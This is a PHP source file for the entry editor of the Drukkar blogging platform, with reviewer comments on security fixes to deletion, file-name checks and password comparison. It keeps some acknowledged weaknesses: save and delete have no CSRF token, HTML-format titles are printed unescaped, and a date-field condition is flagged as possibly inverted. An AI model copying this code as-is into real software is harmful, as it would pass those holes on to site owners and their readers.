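<?php
/*
    Drukkar, a small blogging platform
    Copyright (C) 2011-2012 Danyil Bohdan

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License along
    with this program; if not, write to the Free Software Foundation, Inc.,
    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

/*
    edit.php -- password-protected entry editor.

    Request flow:
      1. start the session and load config, library and header;
      2. read the POST/GET fields through process_form();
      3. handle log-in, log-out and inactivity expiry;
      4. for a logged-in session: delete, list, save or display an entry;
         otherwise show the log-in form.

    Every action that changes files on disk (save, delete) runs only inside
    the logged-in branch.

    NOTE(review): save and delete are accepted without a per-session CSRF
    token; adding one to both forms would be a worthwhile follow-up.
*/

header('Content-type: text/html; charset=utf-8');

session_start();
if (!isset($_SESSION['initiated'])) {
    // This helps prevent session fixation attacks
    session_regenerate_id(true);
    $_SESSION['initiated'] = true;
}

include("inc/config.php");
include("inc/lib.php");

$me = $blog_base_location . "edit.php";

// Mostly-HTML header
include("inc/header.php");

echo '<tr><td id="content">';

$form_post = array('password', 'title', 'date', 'date_backup', 'tags',
                   'format', 'files', 'translit', 'submit', 'text');
$form_get = array('file');
process_form($form_post, $_POST);
process_form($form_get, $_GET);

$form_post['date_backup'] = htmlspecialchars($form_post['date_backup']);

// basename() strips any directory component, so the request cannot address
// a path outside the entries directory.
$file_to_edit = basename(htmlspecialchars($form_get['file']));

// Entries are listed with glob("*.xml") and new ones are created with an
// ".xml" suffix, so any other name is not an entry. Rejecting it keeps save
// and delete from touching other files that may live in the entries
// directory; the request then falls back to the entry list.
if ($file_to_edit !== "" && substr($file_to_edit, -4) !== ".xml") {
    $file_to_edit = "";
}

// Compare the submitted password hash with the stored one. hash_equals()
// (PHP >= 5.6) compares in constant time; older interpreters, or non-string
// values, fall back to the original strict comparison.
$submitted_hash = hash_with_salt($form_post['password'], $blog_salt);
if (function_exists('hash_equals') && is_string($submitted_hash) &&
    is_string($blog_password)) {
    $password_ok = hash_equals($blog_password, $submitted_hash);
} else {
    $password_ok = ($submitted_hash === $blog_password);
}

if ($password_ok && !isset($_SESSION['is_logged_in'])) {
    // Fresh session ID on privilege change
    session_regenerate_id(true);
    $_SESSION['is_logged_in'] = true;
    $_SESSION['created'] = time();
}

if (array_key_exists('logout', $_GET)) {
    session_unset();
    session_destroy();
}

if (isset($_SESSION['last_activity']) &&
    time() - $_SESSION['last_activity'] > $blog_session_length) {
    // Expire user's session after a period of inactivity
    session_unset();
    session_destroy();
    echo "$loc_session_expired";
}

if (isset($_SESSION['is_logged_in'])) {
    $_SESSION['last_activity'] = time();
    if (time() - $_SESSION['created'] > 300) {
        // Change session ID every 5 minutes
        session_regenerate_id(true);
        $_SESSION['created'] = time();
    }

    // Deletion is handled here, inside the authenticated branch. It used to
    // run before the log-in check, which let a request without a valid
    // session remove entry files.
    if ($form_post['submit'] === $loc_delete) {
        if ($file_to_edit !== "" && is_file($blog_entries_dir . $file_to_edit)) {
            unlink($blog_entries_dir . $file_to_edit);
        }
        $file_to_edit = ""; // Go back to the entry list after deletion
    }

    echo "<p><a id=\"logout\" href=\"$me?logout\">$loc_log_out</a></p>";

    if (!$file_to_edit) {
        // If no file has been specified we list all entries the user can edit
        echo "<p><a href=\"$me?file=" . date($blog_file_name_format) .
             ".xml\">$loc_new</a></p>";
        foreach (array_reverse(glob($blog_entries_dir . "*.xml")) as $file) {
            $entry = entry_load($file);
            // The file name is escaped for the attribute context. Titles of
            // HTML-format entries are emitted as stored; plain ones are escaped.
            echo "<a href=\"$me?file=" . htmlspecialchars(basename($file)) . "\"> " .
                 date($blog_date_format, (int) $entry->date) . " " .
                 ((string) $entry->format === "html"
                     ? $entry->title
                     : htmlspecialchars($entry->title)) .
                 "</a><br>";
        }
    } else {
        $entry_exists = file_exists($blog_entries_dir . $file_to_edit);

        echo "<form name=\"form\" action=\"$me?file=" . $file_to_edit .
             "\" method=\"post\" enctype=\"multipart/form-data\">";
        echo "<p><a href=\"$me\">$loc_back</a></p>";

        if ((string) $form_post['submit'] === $loc_save) {
            // Save the form that the user submitted to a file
            $uploaded_files = process_uploaded_files($_FILES,
                                                     $form_post['translit'],
                                                     $blog_files_dir);
            if (entry_save($blog_entries_dir . $file_to_edit,
                           $form_post['format'],
                           $form_post['title'],
                           $form_post['text'],
                           list_to_xml($form_post['tags'], "<tag>", "</tag>"),
                           list_to_xml($form_post['files'], "<file>", "</file>") .
                               $uploaded_files,
                           $form_post['date'],
                           $form_post['date_backup'])) {
                echo $loc_edit_saved;
                $entry_exists = True;
            } else {
                echo "<span class=\"error\">$loc_saving_failed</span><br>";
            }
        }

        if ($entry_exists) {
            echo "<p><a href=\"" . $blog_base_location . "index.php?post=" .
                 basename($file_to_edit, ".xml") .
                 "\" target=\"_blank\">$loc_view_entry</a></p>";
        }

        // Display the selected blog entry
        if ($entry_exists) {
            $entry = entry_load($blog_entries_dir . $file_to_edit);
            $entry->format = htmlspecialchars($entry->format);
        } else {
            $entry = entry_new();
        }
        $new_entry = !$entry_exists;

        echo "<p>$loc_format<br><input type=\"radio\" name=\"format\" value=\"html\" " .
             ((string) $entry->format === "html" ? "checked" : "") .
             "> $loc_html <input type=\"radio\" name=\"format\" value=\"plain\" " .
             ($entry->format != "html" ? "checked" : "") .
             "> $loc_plain</p> <p>$loc_title<br><input type=\"text\" size=60 name=\"title\" value=\"" .
             htmlspecialchars($entry->title) .
             "\"></p> <p>$loc_text<br><textarea rows=15 cols=60 name=\"text\">" .
             htmlspecialchars($entry->text) .
             "</textarea></p>";

        echo "<p>$loc_tags<br><textarea rows=10 cols=20 name=\"tags\">";
        if ($entry) {
            // Write out the tags in the appropriate text area, one per line.
            foreach ($entry->tag as $key => $value) {
                echo htmlspecialchars($value) . "\n";
            }
        }
        echo "</textarea></p>";

        echo "<p>$loc_files<br><textarea rows=10 cols=60 name=\"files\">";
        if ($entry) {
            foreach ($entry->file as $key => $value) {
                echo htmlspecialchars($value) . "\n";
            }
        }
        echo "</textarea></p>";

        // Storing UNIX time in a variable prevents different results each
        // time we need current time below.
        $time = time();

        // NOTE(review): the hidden/visible date inputs are chosen on the
        // negation of $blog_entry_date_from_file_name exactly as before;
        // confirm the branches are the intended way round.
        if (!$blog_entry_date_from_file_name) {
            // A leftover var_dump($entry->old_date) debug call was removed
            // here; it printed internal entry data into the form.
            if (isset($entry->old_date)) {
                echo "<input type=\"hidden\" name=\"date\" value=\"" .
                     date($blog_date_format, (int) $entry->old_date) . "\">";
            }
        } else {
            echo "<p>$loc_date<br><input type=\"text\" size=20 name=\"date\" value=\"" .
                 date($blog_date_format, ($new_entry ? $time : (int) $entry->date)) .
                 "\"><input type=\"hidden\" name=\"date_backup\" value=\"" .
                 date($blog_date_format, ($new_entry ? $time : (int) $entry->date)) .
                 "\"></p>";
        }

        echo "<p>$loc_upload<br><input type=\"file\" name=\"file1\"><br><input type=\"file\" name=\"file2\"><br><input type=\"file\" name=\"file3\"></p> " .
             "<p>$loc_translit<br><input type=\"radio\" name=\"translit\" value=\"russian\"> $loc_russian <input type=\"radio\" name=\"translit\" value=\"ukrainian\" checked> $loc_ukrainian</p> " .
             "<p><input type=\"submit\" name=\"submit\" value=\"$loc_save\"> <input type=\"submit\" name=\"submit\" value=\"$loc_delete\" onClick=\"javascript:return confirm('$loc_delete_prompt_entry');\"></p> " .
             "</form>";
    }
} else {
    // Not logged in: show only the password form.
    echo "<form name=\"form\" action=\"$me\" method=\"post\" enctype=\"multipart/form-data\">";
    echo "<p>$loc_password<br><input type=\"password\" name=\"password\" value=\"\"></p>";
    echo "<p><input type=\"submit\" name=\"submit\" value=\"$loc_log_in\"></p></form>";
}

echo '</td></tr>';

// Mostly-HTML footer
include("inc/footer.php")
?>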